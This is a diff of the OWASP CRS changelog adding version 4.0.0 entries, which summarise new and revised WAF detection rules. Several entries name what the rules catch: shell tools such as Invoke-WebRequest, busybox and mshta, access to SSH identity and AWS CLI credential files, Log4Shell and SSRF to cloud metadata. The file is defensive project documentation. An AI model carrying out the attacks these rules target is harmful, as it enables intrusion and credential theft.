@@ -1,11 +1,566 @@ -== OWASP ModSecurity Core Rule Set (CRS) CHANGES == +# OWASP CRS CHANGES -== Report Bugs/Issues to GitHub Issues Tracker or the mailinglist == +## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist * https://github.com/coreruleset/coreruleset/issues or the CRS Google Group at -* https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project +* https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project -== Version 3.3.0 - 2020-07-01 == +## Nightly builds +New changelog entries are written to `.changes-pending.md`. They will be moved to the main changelog before a release. + +## Version 4.0.0 - 2024-02-14 + +Important changes: + * feat: introduce plugin architecture for extending CRS and minimizing attack surface. (Christian Folini, Max Leske, Jozef Sudolský, Andrew Howe) [#2038, #2448, #2404] + * feat: migrate application exclusions and less-used functionality to plugins (Christian Folini, Max Leske, Jozef Sudolský, Andrew Howe) + * feat: introduce early blocking option (Christian Folini) [#1955] + * feat: introduce new rule file/category to detect use of common web shells in responses (955100-955340 PL1, 955350 PL2) (Jozef Sudolský, Andrea Menin) [#1962, #2039, #2116] + * feat: rename 'Node.js' category to 'generic' (Felipe Zipitría) [#2340] + * feat: make all formerly PCRE-only regular expressions compatible with RE2/Hyperscan regular expression engines (Max Leske, Felipe Zipitría, Allan Boll, Franziska Bühler) [#1868, #2356, #2425, #2426, #2371, #2372] + * feat: add support for HTTP/3 (Jozef Sudolský) [#3218] + * feat: add granular control over reporting levels in 9801xx rules (Simon Studer, Andrew Howe, Christian Folini) [#2482, #2488] + * feat: add new rule to explicitly detect multiple Content-Type abuse (CVE-2023-38199) (920620 PL1) (Andrea Menin) [#3237] + * feat: add enable_default_collections flag to not initialize collections by default (Matteo Pace) [#3141] + * feat: extend definition 
of restricted headers to include `Content-Encoding` and `Accept-Charset` by default (920450 PL1, 920451 PL2) (Walter Hop) [#2780, #2782] + * feat: drop HTTP/0.9 support to resolve FP (Federico G. Schwindt) [#1966] + * fix: refactor and rename anomaly scoring variables and paranoia level definition (Simon Studer) [#2417] + * tests: complete goal of 100% test coverage for rules (entire team, Juan-Pablo Tosso, NiceYouKnow) + * feat: switch to using WordNet instead of spell for finding English words in spell.sh (Max Leske) [#3242] + * feat: publish nightly packages regularly (Felipe Zipitría) [#2207] + +Tool changes: + * feat: extend spell.sh script with an opt-in manual list of common and partial words. (Matteo Pace) [#3273] + * feat: rework spell.sh utility to help with detection of false positives English words (Andrea Menin) [#3029] + * feat: improve usability of spell.sh utility (Max Leske) [#3238] + * feat: extend rules-check.py script to better enforce rule format in project guidelines (Ervin Hegedus) [#3113] + * feat: extend rules-check.py script to ensure that `auditLogParts` is only used in last chained rule (Ervin Hegedus) [#2609] + * feat: extend rules-check.py script to ensure that rules use `@rx` operator explicitly (Ervin Hegedus) [#2541] + * feat: extend rules-check.py script to strip comments when parsing crs-setup.conf.example (Ervin Hegedus) [#3161] + * feat: add utility to change version numbers (Ervin Hegedus) [#2085] + * feat: add utility script to find rules without tests (Ervin Hegedus) [#2279] + * feat: add crs-rules-check tool that runs sanity checks against rules (Ervin Hegedus) [#2236] + * feat: add utility to find longest data lengths (Ervin Hegedus) [#2277] + * feat: improve rule-ctl script to modify rules (Max Leske) [#2193] + * feat: improve unique ID matching and documentation in send-payload-pls.sh (Manuel Spartan) [#2288] + * feat: unify regexp utils to automate error-prone actions and automatically update rules from regular 
expression sources (Max Leske) [#2149, #2223, #2423, #2495, #2489, #2473] + * fix: adjust log directories needed for volume mounts to Git (Max Leske) [#2103] + * fix: replace backend docker container for tests to fix JSON Unicode reflection (Max Leske) [#3464] + * feat: add new test method: check for tags on rules against allowlist (Ervin Hegedus) [#3437] + +Changes with direct rule impact (sorted by lowest rule ID per change where available): + * feat: add placeholder files for new plugin architecture (Walter Hop) [#2515] + * feat: check initialization and use for all TX variables (Ervin Hegedus) [#3043] + * feat: extend rule to detect restricted `method override` headers (Mark Zeman / KramNamez) [#3056] + * feat: extend rules to detect keyword `time` as prefix of \*nix and Windows RCE rules (rules later replaced) (Franziska Bühler) [#2819] + * feat: improve Unix shell evasion prefix (various rules) (Jitendra Patro, Max Leske) [#3518] + * feat: improve performance by removing unnecessary lowercase transformations (various rules) (Jozef Sudolský) [#2106] + * feat: add additional prefix commands to 'unix-shell-evasion-prefix' (various rules) (Jitendra Patro) [#3557 + * feat: consolidate 'unix-evasion-prefix*' files to ensure they don't diverge (various rules) (Franziska Bühler, Max Leske, Andrew Howe) [#3531] + * feat: move regexp-assemble data files to root directory (Felipe Zipitría) [#3002] + * feat: move rules to the earliest phase possible based on their inputs (various rules) (Ervin Hegedus) [#1941] + * feat: remove superfluous 'urlDecodeUni' transformations (various rules) (Federico G. 
Schwindt) [#1845] + * feat: rename 'tx.blocking_early' to 'tx.early_blocking' (various rules) (Christian Folini) [#2414] + * feat: simplify regular expressions by replacing upper-case with lower-case matches if the expression is case-insensitive (various rules) (Felipe Zipitría) [#2485] + * feat: remove SecCollectionTimeout from crs-setup.conf (Christian Folini) [#3559] + * fix: do not log 'MATCHED_VAR' when the it contains the full response body (various rules) (Jozef Sudolský) [#1985] + * fix: do not unnecessarily escape forward slashes in regular expressions (various rules) (Federico G. Schwindt) [#1842] + * fix: reformat several initialization rules to follow project guidelines (Ervin Hegedus) [#3157] + * fix: remove auditLogParts actions from all rules where present (Andrea Menin, Ervin Hegedus) [#3034, #3081] + * fix: remove uncommon Content Types from default in `crs-setup.conf.example` (Andrea Menin) [#2768] + * fix: update diverse rules to follow new naming convention with paranoia level TX variables (Christoph Hansen) [#2937] + * fix: update various rules to consolidate use of backslashes to \x5c representation for better compatibility with known WAF engines (various rules) (Andrew Howe, Max Leske) [#2335, #2345, #2375, #2376, #2399, #2400, #2402, #2410, #2420, #2441, #2442, #2454, #2426] + * fix: remove initialization rules for redundant IP reputation variables (901150, 901152) (Andrew Howe) [#2833] + * fix: initialize all variables used properly (901169) (Ervin Hegedus) [#2802] + * feat: improve sampling mode efficiency (901410, 901420, 901440) (Paul Beckett) [#2094] + * fix: replace uses of 'ctl:ruleEngine=Off' with "ctl:ruleRemoveByTag=OWASP_CRS" to accomodate more than one ruleset (901450, 905100, 905110) (Jozef Sudolský) [#2156] + * feat: remove old, commented-out IP reputation check rule (910110 PL1) (Paul Beckett) [#2148] + * feat: detect 'burpcollaborator' scanner (913100 PL1) (Amir Hosein Aliakbarian) [#2152] + * feat: detect 'httpx' scanner 
(913100 PL1) (Will Woodson) [#2045]
+ * feat: detect 'LeakIX' scanner (913100 PL1) (Jozef Sudolský) [#1961]
+ * feat: detect 'QQGameHall' malware (913100 PL1) (Walter Hop) [#2144]
+ * feat: detect User-Agent of Tsunami Security Scanner (913100 PL1) (@hoexter) [#3480]
+ * fix: avoid FP for YAM package manager (913100 PL1) (Jozef Sudolský) [#2022]
+ * fix: move 'ecairn' from scanners to crawlers (913100 PL1) (Felipe Zipitría) [#2408]
+ * feat: detect 'CensysInspect' and seoscanners.net crawlers (913102 PL2) (Andrew Howe) [#2155]
+ * feat: detect 'ecairn' crawler (913102 PL2) (Jozef Sudolský) [#2024]
+ * feat: detect 'Krzana' bot (913102 PL2) (Deepshikha Sinha) [#2432]
+ * fix: remove rule to detect security scanner http headers (913110 PL1) (Christian Folini) [#3241]
+ * feat: remove ineffective anti-scanner list scanners-urls.data and associated rule (913120 PL1) (Christian Folini) [#3235]
+ * fix: correct the regular expression assembly (920120 PL1) (Max Leske) [#2333]
+ * feat: increase rule score from warning to critial (920220 PL1) (Max Leske) [#3512]
+ * fix: reduce FPs by handling the last path segment separately in new rule (920220 PL1, 920221 PL1) (Max Leske) [#3512]
+ * fix: reduce FPs by matching on decoded variables (920220 PL1) (Max Leske) [#3512]
+ * feat: prevent FPs by moving rule to higher PL (920240 PL2) (Max Leske) [#3506]
+ * feat: valiadate 'SEC-CH-UA' and 'SEC-CH-UA-MOBILE' request headers (920274 PL4) (Chaim Sanders) [#1970]
+ * fix: use the right kind of validation for 'Sec-CH-UA' and 'Sec-CH-UA-Mobile' request headers (920274 PL4, 920275 PL4) (somechris) [#2028]
+ * fix: make validatioin of 'Sec-Fetch-User' header more strict (920275 PL4) (somechris) [#2020]
+ * feat: move rule from PL2 to PL3 (920300 PL3) (Franziska Bühler) [#2013]
+ * fix: amend rule to exclude CONNECT requests from requiring an Accept header (920300 PL3) (Andrew Howe) [#2297]
+ * feat: add IPv6 to the 'Host header is a numeric IP address' check (920350 PL1) (itsTheFae, 
Ervin Hegedus, Jozef Sudolský) [#1929]
+ * fix: avoid FP on '.axd' in restricted extensions, these are public (920440 PL1) (Jozef Sudolský) [#1925]
+ * feat: rework restricted headers mechanism into two separate lists (920450 PL1, 920451 PL2) (Andrew Howe) [#3152]
+ * fix: avoid FP in 'application/\*+json' Content-Type (920470 PL1) (Mirko Dziadzka, Walter Hop) [#2455]
+ * fix: avoid FP in CalDAV Content-Type (920470 PL1) (Vandan Rohatgi) [#2505]
+ * fix: avoid FP in 'Content-Type' header with '#' character (920470 PL1) (Jozef Sudolský) [#1856]
+ * fix: avoid FP on 'version' string in Content-Type header (920470 PL1) (Jozef Sudolský) [#1901]
+ * fix: resolve false negative when matching against allowed charsets variable (920480 PL1) (katef, Federico G. Schwindt) [#1957]
+ * fix: replace unnecessary capture groups in regular expressions with non-capturing groups (920510 PL3, 932200 PL2, 942510 PL2, 942511 PL3) (Federico G. Schwindt) [#1983]
+ * feat: improve explanatory rule comments (920520 PL1) (Max Leske) [#2391]
+ * feat: validate 'Accept-Encoding' header (920520 PL1, 920521 PL3) (Franziska Bühler) [#2357]
+ * feat: new rule detect multiple occurrences of charset keyword in content type header (920530 PL1) (Jan Gora / terjanq) [#2571]
+ * feat: new rule to detect Unicode character bypass check for non JSON requests (920540 PL1) (Franziska Bühler, 0SPwn) [#2512]
+ * feat: new rule to detect # char in URIs (920610 PL1) (Karel Knibbe) [#2919]
+ * fix: use correct anomaly scoring variables and paranoia level tags across several rules (921170 PL1, 921220 PL4, 932220 PL2, 932331 PL3, 933211 PL3, 934101 PL1, 942362 PL2, 951100) (Christoph Hansen) [#2931]
+ * feat: new rules to detect HTTP parameter pollution bypasses (921210 PL3, 921220 PL4) (Christian Folini) [#2747]
+ * fix: use correct anomaly scoring variables and paranoia level tags across several rules (921220 PL4, 932101 PL2, 932331 PL3, 933211 PL3, 942362 PL2) (Ervin Hegedus) [#2832]
+ * feat: new rule to detect 
range header that is now forbidden on PL3 and up (921230 PL3) (Christian Folini) [#2760]
+ * feat: new rule to detect mod_proxy attack (CVE-2021-40438) (921240 PL1) (Franziska Bühler) [#2818]
+ * fix: add urlDecodeUni transformation rules with REQUEST_URI / REQUEST_BASENAME in phase 1 (921240 PL1, 920440 PL1, 920201 PL2, 920202 PL4) (Christian Folini) [#3411]
+ * feat: new rules to detecting ModSecurity body processor confusion using the `Content-Type` HTTP header (921421 PL1, 921422 PL2) (Simon Studer, Ervin Hegedus) [#2763]
+ * fix: handle false positives when detecting ModSecurity body processor confusion (921422 PL2) (Ervin Hegedus) [#2784]
+ * feat: new rules detecting attacks on multipart headers (922100 PL1, 922110 PL1, 922120 PL1) (Felipe Zipitría) [#2769]
+ * fix: prevent unintended match of character set substrings in multipart/form-data requests (922100 PL1) (Jozef Sudolský) [#3470]
+ * feat: remove redundant t:lowercase for a little performance (922110 PL1) (Jozef Sudolský) [#3469]
+ * fix: remove possessive quantifiers (922110 PL1) (Felipe Zipitría) [#2989]
+ * fix: update comments (922110 PL1, 942440 PL2) (Jozef Sudolský) [#3468]
+ * fix: add missing quotes at the end of action lists (930050) (Ervin Hegedus) [#2184]
+ * feat: disassemble regular expression (930100 PL1) (Andrew Howe) [#2298]
+ * fix: detect path traversal in uploaded file names (930100 PL1, 930110 PL1) (k4n5ha0, Franziska Bühler, Felipe Zipitría) [#2451]
+ * fix: detect triple dot path traversal (930100 PL1, 930110 PL1) (Franziska Bühler) [#2309, #2310]
+ * feat: extended rule to detect Tomcat specific path traversal attack (930110 PL1) (Christoph Hansen) [#2915]
+ * fix: avoid FP for '..' 
without slashes (930110 PL1) (Tetrik, Walter Hop) [#2016]
+ * feat: block access to AWS CLI files (930120 PL1, 930121 PL2) (Jozef Sudolský) [#2439]
+ * feat: block access to extended list of sensitive files (930120 PL1, 930121 PL2, 930130 PL1) (Jozef Sudolský) [#1960]
+ * feat: detect /proc and /sys access attempts (930120 PL1, 930130 PL1) (Andrew Howe) [#2154]
+ * feat: extend rule to detect access attempts to /tmp/ (930120 PL1, 930121 PL2) (Max Leske) [#3131]
+ * feat: extend rule to detect ECDSA type SSH identity files via list of sensitive \*nix files (930120 PL1) (Pinaki Mondal / 0xInfection) [#2586]
+ * fix: avoid detecting Google OAuth2 callback requests as malicious (930120 PL1, 930121 PL1) (Jozef Sudolský, Christian Folini) [#1958]
+ * feat: extend rule to detect additional sensitive files on \*nix systems (930121 PL2, 930130 PL1) (Gwendal Le Coguic / gwen001) [#2560]
+ * feat: new rules to detect LFI and SQLi in user-agent and referer request headers (930121 PL2, 942152 PL2, 942321 PL2) (Franziska Bühler, Max Leske, Shivam Bathla) [#3102]
+ * fix: extend rule to detect more LFI (930121 PL2) (Felipe Zipitría) [#2791]
+ * feat: add BlockCypher.log to restricted-files.data (930130 PL1) (Jozef Sudolský) [#3501]
+ * feat: add 'sslvpn_websession' to restricted-files.data (930130 PL1) (Jozef Sudolský) [#2338]
+ * feat: add .vscode to restricted-files.data (930130 PL1) (Frederik Himpe) [#3471]
+ * feat: extend data file to include additional restricted file names (restricted-files.data, 930130 PL1) (Jitendra Patro) [#3219]
+ * feat: extend data file to include PrestaShop configuration file (restricted-files.data, 930130 PL1) (Jean-François Viguier) [#3192]
+ * feat: extend rule to detect `npm-shrinkwrap.json` to restricted-files (930130 PL1) (Esa Jokinen / oh2fih) [#2627]
+ * fix: block access to the Java-related WEB-INF directory (930130 PL1) (Jozef Sudolský) [#2092]
+ * fix: remove duplicate keyword (930130 PL1) (Jozef Sudolský) [#3517]
+ * feat: extend rules 
to detect additional protocols in RFI attacks (931130 PL2, 934120 PL2) (Karel Knibbe) [#2572]
+ * feat: extend rule to detect `url:file:` schema in Java RFI attacks (931130 PL2) (Andrew Howe) [#2727]
+ * fix: add local_file scheme from Python 2 (931130 PL2, 934120 PL2) (Felipe Zipitría) [#2809]
+ * fix: close userinfo-based bypass (931130 PL2) (Andrea Menin) [#2479]
+ * feat: new rule to detect path traversal attacks using URL encoded URL schemes in Java applications (931131 PL2) (Christoph Hansen) [#2902]
+ * feat: extend rule to detect additional \*nix shell commands (931160 PL1) (Gwendal Le Coguic / gwen001) [#2563]
+ * feat: disassemble complex regexes for 932xxx rules that were subsequently replaced by other rules (Max Leske) [#2566]
+ * feat: detect additional Unix RCE commands (932100 PL1, 932105 PL1) (Felipe Zipitría) [#2129]
+ * feat: extend rule to detect additional entries to \*nix command lists (932100 PL1, 932105 PL1) (Finn Westendorf / wfinn) [#2552]
+ * feat: extend rule to detect additional \*nix commands (932100 PL1) (Felipe Zipitría) [#2676]
+ * feat: improve and extend cmdline processor to find more evasions (932100 PL1, 932105 PL1, 932230 PL1, 932150 PL1, 932175 PL1, 932220 PL2, 932240 PL1, 932106 PL3) (Felipe Zipitría) [#2907]
+ * fix: avoid false positive with certain HTML character entities (932100 PL1) (Franziska Bühler) [#1954]
+ * feat: move \*nix command injection rule 932101, 932106 into the same range as the other \*nix command injection rules (932231 PL2, 932232 PL3) (Felipe Zipitría, Max Leske) [#3092]
+ * feat: extend rule to detect additional \*nix commands (932105 PL1) (Felipe Zipitría) [#2677]
+ * feat: extend rule to detect `mshta` in Windows shell commands (932110 PL1) (Somdev Sangwan / s0md3v) [#2588]
+ * feat: new Windows commands rules based on lolbas-project replacing 932110, 932115 (932370 PL1, 932380 PL1) (Felipe Zipitría, Franziska Bühler, Max Leske) [#3059, 3170]
+ * fix: avoid false positive on 'sort' (932115 PL1) 
(Franziska Bühler) [#2012]
+ * feat: detect 'Invoke-WebRequest' command (932120 PL1) (Paul Beckett) [#2271]
+ * feat: extend rule to detect additional PowerShell cmdlet on Windows (932120 PL1) (Pinaki Mondal / 0xInfection) [#2589]
+ * feat: extend rule to detect PowerShell RCEs better via new automation (932120 PL1) (Felipe Zipitría) [#2669]
+ * feat: new rule to detect Windows cmdlet aliases (932125 PL1) (Pinaki Mondal / 0xInfection) [#2589]
+ * fix: extend rule to detect character class \*nix expressions (932130 PL1) (Somdev Sangwan / s0md3v, Walter Hop) [#2594]
+ * feat: new rules to detect Log4j / Log4Shell attacks (932131 PL2, 944150 PL1, 944151 PL2, 944152 PL4) (Christian Folini, Max Leske) [#2349]
+ * fix: prevent false positives against brackets in User-Agent header (932131 PL2) (Max Leske) [#3486]
+ * feat: extend rule to detect `busybox`, `$SHELL`, and `${SHELL}` in \*nix RCE attacks (932150 PL1) (Walter Hop) [#2728]
+ * feat: extend rule to detect C99 and printf utilities (932150 PL1) (Karel Knibbe) [#2569]
+ * feat: extend rule to detect `ksh` in \*nix RCE attacks (932150 PL1) (Andrew Howe) [#2721]
+ * feat: extend rule to detect RCE attacks using compression utilities (932150 PL1) (Andrew Howe) [#2712]
+ * feat: extend rule to detect RCEs using Base64 evasions (932150 PL1) (Somdev Sangwan / s0md3v, Andrew Howe) [#2590]
+ * feat: extend rule to detect RCEs using evasions quotes with `python...` commands (932150 PL1) (Somdev Sangwan / s0md3v, Andrew Howe) [#2590]
+ * feat: new rule to detect generalised \*nix RCE (932150 PL2) (Karel Knibbe) [#2583]
+ * feat: replace \*nix command injection rules 932150 PL1, 932151 PL1 with new rules for commands of less than 4 characters and commands of more than 4 characters in length respectively (932250 PL1, 932260 PL1) (Felipe Zipitría, Max Leske) [#3092]
+ * fix: avoid FP on 'time' and 'ping' keywords (932150 PL1) (Walter Hop) [#2457]
+ * feat: extend rule to detect RCE better via automation (932160 PL1) (Felipe 
Zipitría) [#2662]
+ * fix: remove unnecessary prefixes from paths in `unix-shell.data` (932160 PL1) (Felipe Zipitría) [#2662]
+ * feat: extend rule to detect `expre` in unix-shell list (932161 PL2) (Felipe Zipitría) [#2667]
+ * feat: new rules to detect \*nix commands in user-agent and referer request headers (932161 PL2, 932237 PL3) (Franziska Bühler, Max Leske, Shivam Bathla) [#3132]
+ * feat: new rule detecting `alias` builtin (932175 PL1) (Felipe Zipitría) [#2796]
+ * feat: use new automation to generate `restricted-uploads.data` from `restricted-files.data` (932180 PL1) (Max Leske) [#3282]
+ * fix: use correct anomaly scoring variable (932180 PL1, 932200 PL2) (Jozef Sudolský) [#2324]
+ * feat: detect RCE attempts with uninitialized shell vars (932200 PL2) (Andrea Menin) [#2151]
+ * feat: extend rule to detect RCE in user-agent request header (932200 PL2) (Franziska Bühler, Shivam Bathla) [#3108]
+ * feat: reduce FPs by removing User-Agent from individual target list (932200 PL2) (Max Leske) [#3489]
+ * fix: generate correct log entries when using 'MATCHED_VAR_NAME' in conjunction with chain rules (932200 PL2, 933120 PL1, 933151 PL2) (Jozef Sudolský) [#2347]
+ * fix: new rules to handle referer header and fix false positive (932205 PL2, 932206 PL2) (Max Leske) [#3300]
+ * feat: extend rule to detect quote evasion (932210 PL2) (Max Leske) [#3120]
+ * feat: extend rule to detect `sh` (932210 PL2) (Franziska Bühler) [#2816]
+ * feat: extend rule to detect SQLi via automation of keyword list updates (932210 PL2) (Felipe Zipitría) [#2801]
+ * feat: new rule to detect SQLite system command injection (932210 PL2) (flo405, Andrea Menin, Christian Folini) [#2032]
+ * fix: add word boundaries for sh in RCE rules (932230 PL1, 932250 PL1) (Max Leske) [#3186]
+ * fix: avoid FPs in RCE detections against words 'environment' and 'performance' (932230 PL1, 932235 PL1, 932260 PL1, 932236 PL2, 932237 PL3, 932239 PL2) (Esad Cetiner) [#3477]
+ * fix: handle false positive against 
`sh` in \*nix command injection attacks (932230 PL1, 932250 PL1, 932236 PL2) (Max Leske) [#3186]
+ * feat: add unix commands pyversions and py3versions (932235 PL1, 932260 PL1, 932236 PL2, 932237 PL3, 932239 PL2) (Jitendra Patro) [#3465]
+ * feat: replace \*-with-params.ra files with suffix replacements (932235 PL1, 932236 PL2, 932239 PL2, 932237 PL3) (Max Leske) [#3331]
+ * fix: prevent FP on keywords 'more' and 'time' in Unix RCE (932235 PL1) (Franziska Bühler) [#3488]
+ * fix: reduce FPs at the start of strings by excluding 'as' and 'at' (932236 PL2) (Franziska Bühler, Max Leske, Andrew Howe) [#3531
+ * fix: prevent FPs against names due to "axel" and "perl" (932235 PL1, 932260 PL1, 932236 PL2, 932239 PL2, 932237 PL3) (@superlgn) [#3492]
+ * fix: add whitespace after keywords `mail` and `task` to solve false positives (932236 PL2) (Franziska Bühler) [#3274]
+ * fix: align unix-shell-upto3* files (932236 PL2) (Max Leske) [#3128]
+ * fix: handle false positives with word "settings" (932236 PL2, 932237 PL3, 932239 PL2) (Esad Cetiner) [#3394]
+ * fix: prevent FP on keywords more and time in Unix RCE (932236 PL2) (Franziska Bühler) [#3487]
+ * fix: solved false positives with creation of word boundaries for commonly used words used in \*nix RCE rules (932236 PL2) (Max Leske) [#3187]
+ * fix: use correct anomaly scoring variable (932236 PL2) (Ervin Hegedus) [#3112]
+ * fix: improve rule by matching non-word-boundary of commands with options (932237 PL3) (Max Leske) [#3425]
+ * feat: new rule to detect \*nix commands in user-agent and referer request headers (932239 PL2) (Franziska Bühler, Shivam Bathla) [#3104, #3318]
+ * fix: reduce FPs in generic quote evasion detection (932240 PL2) (Max Leske) [#3494]
+ * fix: remove ARGS_NAME from target variables in (932240 PL2) (Andrea Menin) [#2960]
+ * fix: use correct anomaly scoring variables and paranoia level tags across for rule (932240 PL2) (Ervin Hegedus) [#2963]
+ * fix: false positives by requiring specific tokens to 
follow commands (932250 PL1) (Max Leske) [#3186]
+ * fix: Added missing target name to logdata (932260 PL1, 932240 PL2) (Ervin Hegedus) [#3409]
+ * fix: remove chained rule (932260 PL1) (Max Leske) [#3521]
+ * feat: new rules to detect email protocol attacks (932300 PL2, 932310 PL2, 932320 PL2) (Felipe Zipitría) [#2322]
+ * fix: remove additional range expression that cause parsing errors for RE2 (932311 PL3) (Felipe Zipitría) [#2484]
+ * feat: new rules to detect detecting \*nix shell history invocations (932330 PL1, 932331 PL3) (Karel Knibbe) [#2577]
+ * fix: remove 'time' prefix from Windows RCE detection (932370 PL1, 932380 PL1) (Max Leske) [#3528]
+ * feat: extend rule to detect additional file extensions via list of executable PHP files (933110) (Jan Gora / terjanq) [#2585]
+ * feat: extend data file to add missing PHP config directives (php-config-directives.data, 933120 PL1) (Max Leske) [#3028]
+ * feat: extend rule to detect additional sensitive PHP directives (933120 PL1) (Gwendal Le Coguic / gwen001) [#2561]
+ * feat: extend rule to detect PHP config directives via automation of keyword list updates (933120 PL1) (Felipe Zipitría) [#2696]
+ * feat: extend rule to detect sensitive PHP variables better (933130 PL1) (Felipe Zipitría) [#2668]
+ * tests: clean test definitions and provide proper descriptions (933150 PL1, 933160 PL1) (Andrea Menin, Matteo Pace, Max Leske) [#3462]
+ * feat: extend data file to include additional php function names (php-function-names-933151.data, 933151 PL2) (Jitendra Patro) [#3212]
+ * feat: automate generation of PHP function dictionaries, revisited detection (933160 PL1, 933161 PL3, 933150 PL1, 933151 PL2) (Juan-Pablo Tosso, Christian Folini, Matteo Pace) [#3273]
+ * feat: extend rule to detect `document.domain` XSS (933160 PL1, 941180 PL1) (Franziska Bühler, 0SPwn) [#2567]
+ * feat: extend rule to detect evasions in PHP contexts with `"` (933160 PL1) (Somdev Sangwan / s0md3v) [#2596]
+ * feat: rearrange keywords (933160 PL1, 
941390 PL1) (Karel Knibbe) [#2905]
+ * fix: handle false positive by fixing whitespace matching after PHP command (933160 PL1) (Max Leske) [#3432]
+ * fix: solve ReDoS issue in rule (933161 PL3) (Andrea Menin) [#2302]
+ * feat: extend rule to detect `bzip2` wrapper in PHP injection attacks (933200 PL1) (Andrew Howe) [#2723]
+ * feat: extend rule to detect `ssh2.\*` wrappers in PHP injection attacks (933200 PL1) (Andrew Howe) [#2731]
+ * fix: avoid false positive when cookie contains slash (933210 PL1) (Ervin Hegedus) [#1996]
+ * fix: close PHP whitespace bypass (933210 PL1) (Walter Hop) [#2033]
+ * fix: prevent excessive backtracking (933210 PL1) (Andrea Menin) [#2214]
+ * feat: new rule to detect PHP injection attacks without terminating semi-colon (933211 PL3) (Karel Knibbe) [#2581]
+ * feat: extended rule to detect Node.js injection attacks using `require` and `child_process` (934100 PL1, 932101 PL2) (Andrea Menin) [#2893]
+ * feat: extend rule to detect Node.js RCE better (934100 PL1) (rektor0) [#2578]
+ * feat: improve transformation pipeline to detect Base64-encoded evasions (934100 PL1) (Andrew Howe) [#3203]
+ * feat: new rule to detect Node.js RCE detection (934101 PL2) (rektor0) [#2578]
+ * fix: improve js rule transformation pipelines (934101 PL1, 934130 PL1, 934169 PL1, 934131 PL2) (Andrew Howe) [#3312]
+ * feat: extend data file to include additional indicators (ssrf.data, 934110 PL1) (Jitendra Patro) [#3213]
+ * feat: extend rule to detect SSRF better (934110 PL1) (Felipe Zipitría) [#2660]
+ * feat: new rules to detect common IP-based SSRF targets (934110 PL1, 934120 PL2) (Felipe Zipitría) [#2259]
+ * feat: extend rule to detect additional schema and IP evasion techniques in SSRF (934120 PL2) (Felipe Zipitría, Max Leske) [#2599]
+ * feat: extend rule to detect octal address of AWS metadata endpoints (934120 PL2) (Karel Knibbe) [#2555]
+ * feat: extend rule to detect SSRF better by inspecting targets beyond just ARGS (934120 PL2) (Karel Knibbe) [#2555] 
+ * feat: new rules to detect JavaScript prototype pollution (934130 PL1, 934131 PL2) (Walter Hop) [#2411]
+ * fix: remove base64 transformation due to limited effectiveness and to align behavior across ModSecurity v2.x and libModSecurity v3.x engines (934130 PL1) (Andrea Menin) [#3378]
+ * fix: remove overly specific rule with limited benefits and lack of cross-engine compatibility (934131 PL2) (Andrea Menin) [#3378]
+ * feat: new rules to detect detection of Perl and Ruby RCE signatures in a generic way (934140 PL2, 934150 PL1) (Karel Knibbe) [#2587]
+ * feat: new rule to detect Node DoS attack via expressions resolving to true (934160 PL1) (Karel Knibbe) [#2917]
+ * feat: new rule for PHP supporting `data:` scheme without using `//` before the content-type (934170 PL1) (Felipe Zipitría) [#3018]
+ * feat: extend rules to detect path based XSS via new target REQUEST_FILENAME in 941xxx rules (Walter Hop) [#2894]
+ * feat: run libinjection XSS detector on request filename in PL2 (941101 PL2) (Andrew Howe) [#2208]
+ * feat: move rule from PL1 to PL2 (941120 PL2) (Christian Folini) [#2306]
+ * fix: avoid false positive by adding character limit (941120 PL2) (Christian Folini) [#1872]
+ * fix: avoid FP in Base64 content (941120 PL1) (Jozef Sudolský) [#2226]
+ * fix: remove unnecessary character escape (941120 PL2) (Andrew Howe) [#2805]
+ * fix: avoid FP in XMLNLS (941130 PL1) (Walter Hop) [#2192]
+ * fix: solve ReDoS issue in rule (941140 PL1) (Andrea Menin) [#2050]
+ * feat: detect 'dialog' tag in XSS no-script payloads (941160 PL1) (Jitendra Patro) [#3473]
+ * feat: disassemble complex regex fully (941160 PL1) (Felipe Zipitría) [#2701]
+ * fix: make regular expression more restrictive (941170 PL1) (Andrea Menin) [#2292]
+ * fix: new rule at PL2 to move the detection of '-->' out of PL1 due to false positives (941181 PL2) (Paul Beckett) [#2082]
+ * feat: disassemble complex regex (941210 PL1) (Felipe Zipitría) [#3262]
+ * feat: extend rule to detect XSS evasions using 
carriage return (\r) and new line (\n) characters (941210 PL1) (oct0pus7) [#2576]
+ * feat: disassemble complex regex (941220 PL1) (Felipe Zipitría) [#3263]
+ * fix: correct numerical values used for HTML entity evasion detection (941220 PL1) (Jitendra Patro) [#3479]
+ * fix: avoid false positive with Russian characters (941310 PL1) (Max Leske) [#2107]
+ * feat: improve detection by adding missing javascript `prompt` and `confirm` methods (941390 PL1) (Jitendra Patro) [#3395]
+ * feat: new rule to detect JavaScript methods (941390 PL1) (Franziska Bühler) [#2702]
+ * feat: extend rule and moved rule from PL3 to PL2 (942101 PL2) (Matteo Pace) [#2922]
+ * feat: extended rule to detect common SQL injection probing in path segments (942110 PL2) (Andrea Menin) [#2914]
+ * feat: prevent FPs by removing rule (942110 PL2) (Max Leske) [#3505]
+ * feat: add target REQUEST_FILENAME to rule to detect path-based SQLi attacks (942120 PL2) (Andrew Howe) [#3057]
+ * feat: extend rule to detect use of `collate` in SQLite injection attacks (942120 PL2) (Jan Gora / terjanq) [#2584]
+ * fix: extend rule to detect more SQLi (942120 PL2) (Karel Knibbe) [#2556]
+ * fix: resolve issue with regular expression and improve SQLi detection by detecting 'not between' (942120 PL2) (NiceYouKnow, Max Leske, Franziska Bühler) [#2115]
+ * fix: update SQL reserved words (942120 PL2) (Felipe Zipitría) [#2798]
+ * feat: extend rule to detect `glob` in list of SQLi tautologies (942130 PL2) (Franziska Bühler) [#2729]
+ * fix: remove unneeded TX variables (942130 PL2, 942131 PL2, 942521 PL3) (Andrea Menin) [#3293]
+ * feat: detect more error-based SQL injections (942150 PL2, 951230 PL1) (Jozef Sudolský) [#2429]
+ * feat: extend rule to detect more SQL function names (942150 PL2) (Karel Knibbe) [#2895]
+ * feat: extend rules to detect more SQL error messages and functions (942151 PL1, 942152 PL1, 951220 PL1, 951230 PL1, 951240 PL1) (Jitendra Patros) [#3336]
+ * feat: extend rule to detect additional SQL 
function signatures (942151 PL1) (Karel Knibbe) [#2570]
+ * feat: extend rule to detect `endswith`, `startswith`, `unistr`, `pg_client_encoding` and various JSON SQL functions (942151 PL1) (Franziska Bühler) [#2874]
+ * feat: extend rule to detect various JSON functions (942151 PL1) (Franziska Bühler) [#3041]
